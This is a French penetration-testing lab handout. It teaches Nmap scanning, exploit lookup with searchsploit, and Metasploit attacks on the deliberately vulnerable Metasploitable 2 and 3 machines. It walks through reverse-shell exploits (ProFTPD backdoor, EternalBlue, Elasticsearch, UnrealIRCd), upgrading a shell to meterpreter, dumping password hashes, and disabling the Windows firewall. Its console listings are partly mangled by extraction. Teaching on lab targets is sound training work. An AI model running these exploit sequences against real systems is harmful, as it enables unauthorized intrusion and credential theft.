# **TP test d'intrusion**

Reconnaissance avec Nmap et utilisation de Metasploit

Olivier LASNE - olivier@lasne.pro

# Introduction

Dans ce TP, nous allons voir comment utiliser Nmap pour découvrir services présents sur une machine, et récupérer leur version.

Nous verrons aussi comment vérifier si il existe un exploit pour la version utiliser, et comment exploiter une vulnérabilité avec le framework Metasploit.

# **Nmap**

Nmap est un scanner réseau, il peut être utiliser à la fois pour découvrir les machines présentes sur un réseau, et pour lister les services (et leur version) d'une machine.

Nmap a de nombreuses options, nous ne les détaillerons pas toutes ici.

# Scan basique

Si on lui donne une IP en paramètre, nmap va simplement effectuer un scan de port TCP, et lister les ports ouverts.

Exemple avec Metasploitable:

```
1 $ nmap 192.168.56.210
 2 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 18:46 CET
 3 Nmap scan report for vulnerable (192.168.56.210)
4 Host is up (0.00050s latency).
 5 Not shown: 976 closed ports
6 PORT STATE SERVICE
7 21/tcp open ftp
8 22/tcp open ssh
9 80/tcp open http
10 135/tcp open msrpc
11 139/tcp open netbios-ssn
12 445/tcp open microsoft-ds
13 3306/tcp open mysql
14 3389/tcp open ms-wbt-server
15 4848/tcp open appserv-http
16 7676/tcp open imqbrokerd
17 8009/tcp open ajp13
18 8022/tcp open oa-system
19 8031/tcp open unknown
20 8080/tcp open http-proxy
21 8181/tcp open intermapper
22 8383/tcp open m2mservices
23 8443/tcp open https-alt
```

```
24 9200/tcp open wap-wsp
25 49152/tcp open unknown
26 49153/tcp open unknown
27 49154/tcp open unknown
28 49157/tcp open unknown
29 49158/tcp open unknown
30 49161/tcp open unknown
31
32 Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds
```

# Découvrir les machines présentes sur un réseau

#### Ping scan

Pour découvrir rapidement les machines présentes sur le réseau, on peut faire simplement un ping scan :

```
1 nmap -sn 10.11.1.1-254
```

# **Top ports**

Néanmoins, un certain nombre de machines sont configurés pour ne pas répondre aux ping. On peut choisir de scanner uniquement les ports les plus communs

```
1 nmap 10.11.1.1/24 -Pn --top-ports 10 --open -sS
```

- -Pn: scan les ports même si la machine ne réponds pas aux pings.
- --top-ports xx: scan uniquement les xx ports les plus communs.
- **--open**: dans la sortie indique uniquement les ports ouverts.
- -sS: syn scan, effectue seulement la 1ère partie du handshake TCP et est donc plus rapide. Peut-être également plus discret, mais est généralement détecté aujourd'hui.

#### Enregister les résultats

Nmap support 3 formats d'enregistrement

- -oN: format texte classique. Identique à la sortie de la console.
- -oG: grepable nmap, optimisé pour une recherche dans les résultats avec grep
- -oX : format xml. Peut permettre de **reprendre un scan interrompu**, et l'importation des résultats dans certains outils comme **Metasploit**.

#### Scanner une machine

Une fois notre cible définie, on va chercher à avoir un maximum d'information.

#### **Options communes**

Avant d'attaquer une machine, on va généralement effectuer un **scan TCP complet** avec les options suivantes :

```
1 nmap -sV -sC -0 -p- 192.168.56.210 -oN full.nmap
```

- -p- va indiquer que l'on liste absolument tous les ports
- -sV indique que l'on veut récupérer les informations de version
- -sC indique que l'on lance les scripts nmap de récupération d'information qui n'ont pas d'effet de bord
- -0 signifie que nmap va essayer de détecter la version du système d'exploitation présent en face.
- -oN écrit les résultats dans le fichier full.nmap

On réalise généralement un **1er scan de port** sans l'option –p– de façon à avoir uniquement les 1000 ports les plus fréquents. Et dans un second temps un scan avec tous les ports.

#### **Scan UDP**

Un scan UDP peut être (très) long. Néanmoins, il est généralement intéressant d'effectuer un scan au moins des ports les plus fréquents.

```
1 nmap -sU 192.168.56.210 -oN udp.nmap
```

#### **Scripts Nmap**

Nmap a la possibilité d'exécuter des scripts. Les scripts sont stockés dans le dossier /usr/share/nmap/scripts

Lister les scripts en lien avec SMB:

```
1 ls /usr/share/nmap/scripts | grep smb
```

On peut obtenir de l'aide sur un script de la façon suivante :

```
1 $ nmap --script-help=smb-os-discovery.nse
2 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-29 11:21 EST
3
4 smb-os-discovery
```

```
5 Categories: default discovery safe
6 https://nmap.org/nsedoc/scripts/smb-os-discovery.html
     Attempts to determine the operating system, computer name, domain,
        workgroup, and current
     time over the SMB protocol (ports 445 or 139).
8
9
     This is done by starting a session with the anonymous
     account (or with a proper user account, if one is given; it likely
        doesn't make
     a difference); in response to a session starting, the server will
11
        send back all this
12
     information.
13
14
     The following fields may be included in the output, depending on the
     circumstances (e.g. the workgroup name is mutually exclusive with
        domain and forest
    names) and the information available:
16
17
     * OS
     * Computer name
18
19 [...]
```

/!\ Attention: par défaut un pare-feu filtre le SMB sur Metasploitable 3. On peut le désactiver avec la commande suivante:

```
1 netsh advfirewall set allprofile state off
```

### Un **script nmap** est exécuté de la façon suivante :

```
1 $ nmap --script=smb-os-discovery.nse 192.168.56.210 -p139,445
2 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-14 18:53 CET
3 Nmap scan report for vulnerable (192.168.56.210)
4 Host is up (0.00033s latency).
6 PORT
         STATE SERVICE
7 139/tcp open netbios-ssn
8 445/tcp open microsoft-ds
10 Host script results:
11 | smb-os-discovery:
       OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows
12
      Server 2008 R2 Standard 6.1)
       OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
13
14
       Computer name: metasploitable3-win2k8
       NetBIOS computer name: METASPLOITABLE3\x00
16
       Workgroup: WORKGROUP\x00
17
   _ System time: 2020-12-14T09:53:16-08:00
18
19 Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
```

# **Utilisation d'exploit**

Dans le cadre d'un test d'intrusion, on va chercher à savoir s'il existe une vulnérabilité pour une des versions utilisées. À la fois sur des sites comme cvedetails.com, et directement sur des moteurs de recherche.

Dans notre cas, on va chercher directement à voir s'il existe **un exploit**. C'est à dire un script exploitant la vulnérabilité.

### **Exploit-DB**

Le site de référence pour les exploits publiques est **exploit-db.com**.

On peut effecter des recherches directement sur l'interface web, mais il existe sous kali directement un outil en ligne de commande : searchsploit.

On peut utiliser l'option -u pour mettre à jour la base de données. searchsploit -u

L'option -x pour voir le détail d'un exploit. searchsploit -x unix/remote/17491.rb.

Et l'option -m pour en faire une copie dans le dossier courant. searchsploit -m unix/remote /17491.rb

Il n'y a pas d'unité sur la façon dont ces scripts sont écrits, et il est souvent nécessaire de les adapter.

#### Convertir un fichier au format CRLF

Il est parfois nécessaire de convertir les fichiers écrit sous Windows (convention CRLF). Pour cela on peut simplement utiliser l'outil dos 2 unix.

```
1 $ file 31819.pl
2 31819.pl: ASCII text, with CRLF line terminators
3
4 $ dos2unix 31819.pl
```

```
5 dos2unix: converting file 31819.pl to Unix format...
6
7 $ file 31819.pl
8 31819.pl: ASCII text
```

# Metasploit

Metasploit est un **framework d'attaque**. Il intègre un nombre important d'**exploits** et de **payloads** et permet de les utiliser de façon unifiée.

Il intègre notamment des exploits très complexes comme ceux pour la vulnérabilité MS17-010.

Son intérêt réside aussi dans le shell **meterpreter** et les nombreux modules de **post-exploitation** qu'il intègre.

#### Démarrer la base de données

Metasploit utilise une base de données postgresql. Avant d'utiliser le framework il est nécessaire de démarrer la base de données avec la commande msfdb run.

L'état de la base de données peut être vérifiée avec msfdb status.

#### **Msfconsole**

On lance le framework avec la commande msfconsole.

```
1 $ msfconsole
2 IIIIII dTb.dTb
  II
           4' v 'B
                       .'"".'/
          6. .P
    II
4
5 II 'T;..;P'
6 II 'T;;P'
           'T; ;P'
7 IIIIII
            'YvP'
8
9 I love shells --egypt
10
11
12
         =[ metasploit v6.0.17-dev
13 + -- --=[ 2076 exploits - 1124 auxiliary - 352 post
                                                           ]
14 + -- --=[ 592 payloads - 45 encoders - 10 nops
                                                           ]
15 + -- --= [ 7 evasion ]
16
17 Metasploit tip: You can use help to view all available commands
18
19 msf6 >
```

Pour obtenir de l'aide, il existe la commande help, ainsi que l'option –h les différentes commandes.

À noter que metasploit supporte aussi l'autocomplétion avec **Tab**.

Metasploit a 4 catégories de modules principaux :

- auxiliary
- exploits
- payloads
- post

**Exploit :** La collection d'exploit de Metasploit. Ils sont classés par architecture de la cible, et protocole.

**Auxilary:** Va contenir les scanners, fuzzeurs, sniffer, etc.

**Payload, Encoders, Nops:** Ensemble de charges malveillantes, et les encodeurs nécessaires pour qu'il atteignent leur destination intacts.

**Post :** Ensemble de modules qui aident à la phase de post-exploitation.

# Rechercher un exploit / module

On peut utiliser la commande search pour chercher un module.

```
1 msf6 > search proftp
2
3 Matching Modules
4 ==========
5
   # Name
6
                                              Disclosure Date
       Rank Check Description
     0 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01
8
      great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer
       Overflow (FreeBSD)
   1 exploit/linux/ftp/proftp_sreplace
9
                                              2006-11-26
       great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (
       Linux)
    2 exploit/linux/ftp/proftp_telnet_iac
                                             2010-11-01
       great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer
       Overflow (Linux)
```

```
3 exploit/linux/misc/netsupport_manager_agent 2011-01-08
                 No NetSupport Manager Agent Remote Buffer Overflow
        average
     4 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02
        excellent No ProFTPD-1.3.3c Backdoor Command Execution
13
     5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22
        excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
     6 exploit/windows/ftp/proftp_banner 2009-08-25
14
                        ProFTP 2.9 Banner Remote Buffer Overflow
        normal
                  No
15
17 Interact with a module by name or index. For example info 6, use 6 or
      use exploit/windows/ftp/proftp_banner
```

#### Utiliser un module

Pour utiliser un module on utilise la commande use.

```
1 msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
2 msf6 exploit(unix/ftp/proftpd_133c_backdoor) >
```

#### **Obtenir des infos**

On utilise la commande show info pour obtenir des informations sur un module.

Pour lister les options d'un module, on utilise show options.

```
1 msf6 exploit(unix/ftp/proftpd_133c_backdoor) > options
2
3 Module options (exploit/unix/ftp/proftpd_133c_backdoor):
5
              Current Setting Required Description
      Name
6
      RHOSTS 192.168.3.173
                                        The target host(s), range CIDR
7
                              yes
         identifier, or hosts file with syntax 'file:<path>'
      RPORT
8
                                        The target port (TCP)
                              yes
9
11 Exploit target:
12
13
      Id Name
14
15
      0
          Automatic
```

Les principales options sont **RHOSTS** qui contient l'IP de la machine cible, et **RPORT** qui indique le port où tourne le service cible.

Les options se configurent avec la commande **set** :

```
1 msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.3.173
2 RHOSTS => 192.168.3.173
```

#### Choix du payloads

Les **payloads compatibles** peuvent être listés avec la commande show payloads. Si compatible, on choisira généralement windows/meterpreter/reverse\_tcp, linux/x86/meterpreter/reverse\_tcp ou linux/x64/meterpreter/reverse\_tcp.

Pour selectionner un payload, on utilisera de la même façon la commande set.

Une fois le **payload** définit. Il est souvent nécessaire de le configurer en définissant **LHOST** (adresse à laquel le payload vient se connecter).

On le configure de la même manière que RHOSTS avec la commande set.

```
1 msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.56.101
2 LHOST => 192.168.56.101
```

Une fois qu'un payload a été définit. Ses **options** appraissent également dans la sortie de la commande **options**.

```
1 msf6 exploit(windows/smb/ms17_010_psexec) > options
2 [...]
3
4 Payload options (windows/meterpreter/reverse_tcp):
              Current Setting Required Description
6
     Name
              -----
                            yes
8
    EXITFUNC thread
                                      Exit technique (Accepted: '',
       seh, thread, process, none)
9
   LHOST 192.168.56.101 yes
                                      The listen address (an
       interface may be specified)
    LPORT 4444
                                      The listen port
                            yes
```

# **Executer un exploit**

Sur les exploits qui le supportent, on peut utiliser la commande check pour vérifier si la cible est vulnérable.

```
1 msf6 exploit(windows/smb/ms17_010_psexec) > check
2
3 [*] 172.16.237.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
4 [-] 172.16.237.130:445 - Host does NOT appear vulnerable.
5 [*] 172.16.237.130:445 - Scanned 1 of 1 hosts (100% complete)
6 [*] 172.16.237.130:445 - Cannot reliably check exploitability.
```

Finalement, on utilise la commande run pour exécuter l'exploit.

```
1 msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run
3 [*] Started reverse TCP double handler on 192.168.3.8:4444
4 [*] 192.168.3.173:21 - Sending Backdoor Command
5 [*] Accepted the first client connection...
6 [*] Accepted the second client connection...
7 [*] Command: echo Fcjmid852usWprlr;
8 [*] Writing to socket A
9 [*] Writing to socket B
   [*] Reading from sockets...
11 [*] Reading from socket A
  [*] A: "Fcjmid852usWprlr\r\n"
12
13 [*] Matching...
14 [*] B is input...
15 [*] Command shell session 1 opened (192.168.3.8:4444 ->
      192.168.3.173:42450) at 2021-01-25 15:55:09 +0100
16
18 uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
```

#### **Améliorer son Shell**

Lorsque l'on obtient un shell un peu minimaliste à travers un exploit. On peut utiliser la commande suivante pour avoir un shell un peu plus classe.

```
1 python -c "import pty;pty.spawn('/bin/bash')"
```

(Il est parfois nécessaire de préciser la version de python: python2 ou python3).

#### Les sessions

Un shell ou **session** peuvt être mis en arrière plan avec la commande background ou le raccourci *Ctrl* + *Z*.

On peut lister les sessions avec la commande sessions.

On peut récupérer une session interactive avec la commande session -i.

```
1 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 1
2 [*] Starting interaction with 1...
3
4 whoami
5 root
```

# Passer à un Shell Meterpreter

```
1 msf6 post(linux/gather/hashdump) > use post/multi/manage/
      shell_to_meterpreter
2 msf6 post(multi/manage/shell_to_meterpreter) > info
3
         Name: Shell to Meterpreter Upgrade
4
      Module: post/multi/manage/shell_to_meterpreter
    Platform: Linux, OSX, Unix, Solaris, BSD, Windows
6
7
        Arch:
         Rank: Normal
8
9
10 Provided by:
11 Tom Sellers <tom@fadedcode.net>
12
13 Compatible session types:
14
    Shell
15
16 Basic options:
17
   Name Current Setting Required Description
             -----
18
19 HANDLER true
                            yes Start an exploit/multi/handler to
        receive the connection
                            no IP of host that will receive the
     connection from the payload (Will try to auto detect).
21 LPORT 4433 yes Port for payload to connect to.
22 SESSION yes The session to run this module of
                                     The session to run this module on
23
24 Description:
```

```
This module attempts to upgrade a command shell to meterpreter. The
26
     shell platform is automatically detected and the best version of
     meterpreter for the target is selected. Currently
27
28
     meterpreter/reverse_tcp is used on Windows and Linux, with
29
     'python/meterpreter/reverse_tcp' used on all others.
31 msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 192.168.3.8
32 LHOST => 192.168.3.8
33 msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 2
34 SESSION => 2
35 msf6 post(multi/manage/shell_to_meterpreter) > run
  [*] Upgrading session ID: 2
37
38 [*] Starting exploit/multi/handler
39 [*] Started reverse TCP handler on 192.168.3.8:4433
40 [*] Sending stage (976712 bytes) to 192.168.3.173
41 [*] Meterpreter session 3 opened (192.168.3.8:4433 ->
      192.168.3.173:48406) at 2021-01-25 16:11:34 +0100
```

# Utiliser le module hashdump

```
1 msf6 post(multi/manage/shell_to_meterpreter) > use post/linux/gather/
      hashdump
2 msf6 post(linux/gather/hashdump) > info
          Name: Linux Gather Dump Password Hashes for Linux Systems
5
        Module: post/linux/gather/hashdump
      Platform: Linux
6
7
          Arch:
8
          Rank: Normal
9
10 Provided by:
11
    Carlos Perez <carlos_perez@darkoperator.com>
12
13 Compatible session types:
14
   Meterpreter
15
    Shell
17 Basic options:
18 Name Current Setting Required Description
19
    SESSION 2
20
                                        The session to run this module on
                              yes
       .
21
22 Description:
23 Post Module to dump the password hashes for all users on a Linux
24
    System
25
26 msf6 post(linux/gather/hashdump) > set SESSION 3
```

#### Exercice:

- 1. Utiliser l'exploit **vsftpd** pour obtenir un shell sur Metasploitable
- 2. Utiliser un autre exploit pour obtenir un shell.

# **Exploitation de Metasploitable 3**

Si vous avez installé vous même la machine :

Compte admin sur la machine : vagrant : vagrant

Le clavier est en qwerty.

### Scan de ports

Comme toujours on commence par un scan de ports :

```
1 nmap -sV -sC 192.168.56.7 -oN nmap/inital.nmap
2
3 nmap -sV -sC -p- 192.168.56.7 -oA nmap/full.nmap
```

#### **Eternal Blue**

On a le port 445 qui est ouvert. On peut vérifier si la machine est vulnérable a **Eternal Blue (MS17-010)** avec un **script nmap**.

```
1 $ ls /usr/share/nmap/scripts | grep smb
2 ...
3 smb-vuln-ms17-010.nse
4 ...
```

La machine semble être vulnérable :

```
1 $ nmap --script=smb-vuln-ms17-010.nse -p 445 192.168.56.7
2 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-17 09:53 CET
3 Nmap scan report for 192.168.56.7
4 Host is up (0.00028s latency).
6 PORT
           STATE SERVICE
7 445/tcp open microsoft-ds
8
9 Host script results:
  | smb-vuln-ms17-010:
       VULNERABLE:
       Remote Code Execution vulnerability in Microsoft SMBv1 servers (
12
      ms17-010)
13
        State: VULNERABLE
        IDs: CVE:CVE-2017-0143
14
15
         Risk factor: HIGH
16
           A critical remote code execution vulnerability exists in
      Microsoft SMBv1
17
           servers (ms17-010).
18
         Disclosure date: 2017-03-14
19
20
        References:
21
           https://technet.microsoft.com/en-us/library/security/ms17-010.
      aspx
           https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-
22
      guidance-for-wannacrypt-attacks/
23
          https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
24
25 Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
```

On peut utiliser un exploit Metasploit pour exploiter la vulnérablitié.

Exploit windows/smb/ms17\_010\_psexec est noté Excellent, il est fiable mais nécessite un named pipe.

Or smbmap nous indique qu'il n'y a pas de pipe accessible :

```
1 $ smbmap -H 192.168.56.7
2 [+] IP: 192.168.56.7:445 Name: 192.168.56.7
```

On peut donc se rabattre sur windows/smb/ms17\_010\_eternalblue.

```
CIDR identifier, or hosts file with syntax 'file:<path>'
8
                                   yes
     RPORT
                   445
                                            The target port (TCP)
9
                                             (Optional) The Windows
     SMBDomain
                                   no
         domain to use for authentication
     SMBPass
                                             (Optional) The password
        for the specified username
11
     SMBUser
                                             (Optional) The username to
                                   no
         authenticate as
12
                                             Check if remote
     VERIFY_ARCH true
                                   yes
         architecture matches exploit Target.
13
     VERIFY_TARGET true
                          yes
                                             Check if remote OS matches
         exploit Target.
14
16 Payload options (windows/x64/meterpreter/reverse_tcp):
17
18
             Current Setting Required Description
     Name
19
               _____
                              yes
     EXITFUNC thread
                                       Exit technique (Accepted: '',
        seh, thread, process, none)
             192.168.56.5 yes
                                       The listen address (an
21
     LHOST
        interface may be specified)
22
     LPORT 4444
                           yes
                                       The listen port
23
24
25 Exploit target:
26
27
     Id Name
         Windows 7 and Server 2008 R2 (x64) All Service Packs
```

Et on peut obtenir un shell avec la commande exploit. À noter que l'exploit n'est pas particulièrement fiable.

#### **Elastic Search**

En se connectant au port 9200, on peut identifier qu'il s'agit d'un elasticsearch en cherchant sur internet avec le

- build\_hash
- lucene version

La version indiquée est la 1.1.1. Il est existe un exploit metasploit pour cette version.

On prend soin de configurer les options correctement

```
1 msf6 exploit(multi/elasticsearch/script_mvel_rce) > options
2
3 Module options (exploit/multi/elasticsearch/script_mvel_rce):
4
5
    Name
                 Current Setting Required Description
6
     ____
                                 no A proxy chain of format type
7
     Proxies
        :host:port[,type:host:port][...]
8
     RHOSTS 192.168.56.7 yes
                                         The target host(s), range
      CIDR identifier, or hosts file with syntax 'file:<path>'
     RPORT
                        yes
                                         The target port (TCP)
9
                9200
     SSL
                 false
                                         Negotiate SSL/TLS for
                                no
       outgoing connections
     TARGETURI /
11
                                yes
                                         The path to the
        ElasticSearch REST API
                                          HTTP server virtual host
12
     VHOST
                                 no
                                yes
13
     WritableDir /tmp
                                          A directory where we can
        write files (only for *nix environments)
14
15
16 Payload options (java/meterpreter/reverse_tcp):
17
     Name Current Setting Required Description
18
19
                          yes
     LHOST 192.168.56.5
20
                                   The listen address (an interface
       may be specified)
21
     LPORT 4785
                          yes
                                    The listen port
23
24 Exploit target:
25
26
     Id Name
27
     --
         ElasticSearch 1.1.1 / Automatic
```

La commande run va nous obtenir un shell sur la machine distante.

**Exercice:** Exploitez par vous-même la vulnérabilité sur : 1. Jenkins 2. Tomcat

# Metasploitable 2

#### **Exercice:**

Commencer par le **ftp** et **ircd**.

#### **Nmap**

On commence par un scan nmap.

```
1 # Nmap 7.80 scan initiated Tue Jan 26 09:21:25 2021 as: nmap -sV -sC -0
       -p- -oN fullscan.nmap 192.168.56.115
2 Nmap scan report for 192.168.56.115
3 Host is up (0.0032s latency).
4 Not shown: 65505 closed ports
5 PORT
            STATE SERVICE
                             VFRSTON
6 21/tcp
            open ftp
                              vsftpd 2.3.4
   _ftp-anon: Anonymous FTP login allowed (FTP code 230)
8
   | ftp-syst:
9
       STAT:
10 | FTP server status:
11
          Connected to 192.168.56.114
12
         Logged in as ftp
         TYPE: ASCII
13
          No session bandwidth limit
14
          Session timeout in seconds is 300
16
          Control connection is plain text
          Data connections will be plain text
17
         vsFTPd 2.3.4 - secure, fast, stable
19 _End of status
                             OpenSSH 4.7pl Debian 8ubuntul (protocol
20 22/tcp
             open ssh
      2.0)
   | ssh-hostkey:
       1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
22
23 _
       2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
          open telnet Linux telnetd
24 23/tcp
25 25/tcp
          open smtp
                              Postfix smtpd
26 | _smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000,
       VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
   _ssl-date: 2021-01-26T09:23:52+00:00; -1s from scanner time.
27
28
   sslv2:
       SSLv2 supported
29
30
       ciphers:
31
        SSL2_RC4_128_EXPORT40_WITH_MD5
32
         SSL2 DES 192 EDE3 CBC WITH MD5
33
        SSL2_RC2_128_CBC_WITH_MD5
34
        SSL2_RC4_128_WITH_MD5
         SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
         SSL2_DES_64_CBC_WITH_MD5
             open domain ISC BIND 9.4.2
37 53/tcp
38 | dns-nsid:
39 _
       bind.version: 9.4.2
40 80/tcp
          open http
                             Apache httpd 2.2.8 ((Ubuntu) DAV/2)
41 | http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
42 | http-title: Metasploitable2 - Linux
43 111/tcp open rpcbind 2 (RPC #100000)
44 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
```

```
45 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup:
      WORKGROUP)
46 512/tcp open exec
                             netkit-rsh rexecd
            open login
47 513/tcp
            open shell
                             Netkit rshd
48 514/tcp
49 1099/tcp open java-rmi GNU Classpath grmiregistry
50 1524/tcp open bindshell Metasploitable root shell
                          2-4 (RPC #100003)
51 2049/tcp open nfs
52 2121/tcp open ftp
                             ProFTPD 1.3.1
53 3306/tcp open mysql
                            MySQL 5.0.51a-3ubuntu5
54 | mysql-info:
55
      Protocol: 10
56
       Version: 5.0.51a-3ubuntu5
57
      Thread ID: 10
58
     Capabilities flags: 43564
      Some Capabilities: Support41Auth, SupportsCompression,
59
      SupportsTransactions, LongColumnFlag, SwitchToSSLAfterHandshake,
      Speaks41ProtocolNew, ConnectWithDatabase
       Status: Autocommit
61 | Salt: &u=n4V4A+Q8beU[JAG}c
62 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1
      ubuntu4))
63 5432/tcp open postgresql PostgreSOL DB 8.3.0 - 8.3.7
64 |_ssl-date: 2021-01-26T09:23:52+00:00; -1s from scanner time.
65 5900/tcp open vnc
                             VNC (protocol 3.3)
66 | vnc-info:
67
       Protocol version: 3.3
68
       Security types:
69 _
        VNC Authentication (2)
70 6000/tcp open X11
                              (access denied)
71 6667/tcp open irc
                             UnrealIRCd
72 6697/tcp open irc
                             UnrealIRCd
73 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
74 _ajp-methods: Failed to get a valid response for the OPTION request
                             Apache Tomcat/Coyote JSP engine 1.1
75 8180/tcp open http
76 | _http-favicon: Apache Tomcat
77 | http-server-header: Apache-Coyote/1.1
78 | http-title: Apache Tomcat/5.5
                             Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby
79 8787/tcp open drb
      /1.8/drb)
80 35476/tcp open java-rmi GNU Classpath grmiregistry
81 39503/tcp open mountd
                             1-3 (RPC #100005)
82 47722/tcp open nlockmgr
                             1-4 (RPC #100021)
83 58834/tcp open status
                             1 (RPC #100024)
84 MAC Address: 08:00:27:83:DC:29 (Oracle VirtualBox virtual NIC)
85 Device type: general purpose
86 Running: Linux 2.6.X
87 OS CPE: cpe:/o:linux:linux_kernel:2.6
88 OS details: Linux 2.6.9 - 2.6.33
89 Network Distance: 1 hop
90 Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.
```

```
LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
91
92 Host script results:
93 |_clock-skew: mean: 1h14m59s, deviation: 2h30m01s, median: -1s
94 |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>,
       NetBIOS MAC: <unknown> (unknown)
95 | smb-os-discovery:
96
       OS: Unix (Samba 3.0.20-Debian)
       Computer name: metasploitable
97
98
      NetBIOS computer name:
     Domain name: localdomain
99
     FQDN: metasploitable.localdomain
100
101 | System time: 2021-01-26T04:23:43-05:00
102 | smb-security-mode:
103 | account_used: <blank>
104
       authentication_level: user
105
       challenge_response: supported
   message_signing: disabled (dangerous, but default)
   _smb2-time: Protocol negotiation failed (SMB2)
108
109 OS and Service detection performed. Please report any incorrect results
        at https://nmap.org/submit/ .
110 # Nmap done at Tue Jan 26 09:25:07 2021 -- 1 IP address (1 host up)
       scanned in 222.17 seconds
```

#### **IRC**

On voit avec le scan nmap que l'on a un UnrealIRCd.

```
1 6667/tcp open irc UnrealIRCd
```

La version n'est pas indiquée, mais on peut regarder s'il existe un exploit.

```
10 Shellcodes: No Results
```

Il existe plusieurs exploits pour la version 3.2.8.1.

On lance metasploit avec sudo msfdb run.

On peut ensuite recherche l'exploit avec la commande search. On peut ensuite le selectionner avec use.

On peut utiliser la commande info pour en savoir un peut plus sur l'exploit.

options nous indique qu'il faut définir une IP distante et un port. On définit l'IP distante avec set

```
1 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
2
3 Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
4
            Current Setting Required Description
5
    Name
6
     ____
                             yes The target host(s), range CIDR
     RHOSTS
        identifier, or hosts file with syntax 'file:<path>'
     RPORT 6667
                    yes The target port (TCP)
8
9
10
11 Exploit target:
12
13
    Id Name
14
15
    O Automatic Target
16
17
18 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS
      192.168.56.115
19 RHOSTS => 192.168.56.115
```

On doit également définir un payload. On les liste avec show payloads. On peut alors selectionner un payload avec set payload.

On vaici choisir le reverse shell cmd/unix/reverse.

```
1 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
  Compatible Payloads
  4
5
                                             Disclosure Date Rank
6
        Name
         Check Description
7
                                             _____
8
      0
          cmd/unix/bind_perl
                                                              manual No
             Unix Command Shell, Bind TCP (via Perl)
9
        cmd/unix/bind_perl_ipv6
      1
                                                              manual No
             Unix Command Shell, Bind TCP (via perl) IPv6
      2
          cmd/unix/bind_ruby
                                                              manual No
             Unix Command Shell, Bind TCP (via Ruby)
11
      3
          cmd/unix/bind_ruby_ipv6
                                                              manual No
             Unix Command Shell, Bind TCP (via Ruby) IPv6
                                                              manual No
          cmd/unix/generic
      4
             Unix Command, Generic Command Execution
      5
          cmd/unix/reverse
                                                              manual No
13
             Unix Command Shell, Double Reverse TCP (telnet)
14
          cmd/unix/reverse_bash_telnet_ssl
                                                              manual No
             Unix Command Shell, Reverse TCP SSL (telnet)
15
      7
          cmd/unix/reverse_perl
                                                              manual No
             Unix Command Shell, Reverse TCP (via Perl)
      8
          cmd/unix/reverse_perl_ssl
                                                              manual No
             Unix Command Shell, Reverse TCP SSL (via perl)
17
      9
         cmd/unix/reverse_ruby
                                                              manual No
             Unix Command Shell, Reverse TCP (via Ruby)
      10 cmd/unix/reverse_ruby_ssl
                                                              manual No
             Unix Command Shell, Reverse TCP SSL (via Ruby)
19
      11 cmd/unix/reverse_ssl_double_telnet
                                                              manual No
             Unix Command Shell, Double Reverse TCP SSL (telnet)
21 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix
      /reverse
22 PAYLOAD => cmd/unix/reverse
```

On peut voir les options du PAYLOAD avec la commande options désormais. On définit en LHOST notre IP sur l'interface réseau privé hôte.

```
8 RPORT 6667
                              yes The target port (TCP)
9
11 Payload options (cmd/unix/reverse):
12
             Current Setting Required Description
      Name
14
      ____
                             -----
                             yes
      LHOST
                                      The listen address (an interface
       may be specified)
      LPORT 4444
                                      The listen port
16
                             yes
17
18
19 Exploit target:
20
21
      Id Name
22
23
      0 Automatic Target
24
25
26 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig eth1
27
   [*] exec: ifconfig eth1
28
29 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
           inet 192.168.56.114 netmask 255.255.255.0 broadcast
              192.168.56.255
           inet6 fe80::1a48:bca4:d564:58c2 prefixlen 64 scopeid 0x20<
              link>
32
           ether 08:00:27:88:5a:59 txqueuelen 1000 (Ethernet)
           RX packets 230134 bytes 19110225 (18.2 MiB)
34
           RX errors 0 dropped 0 overruns 0 frame 0
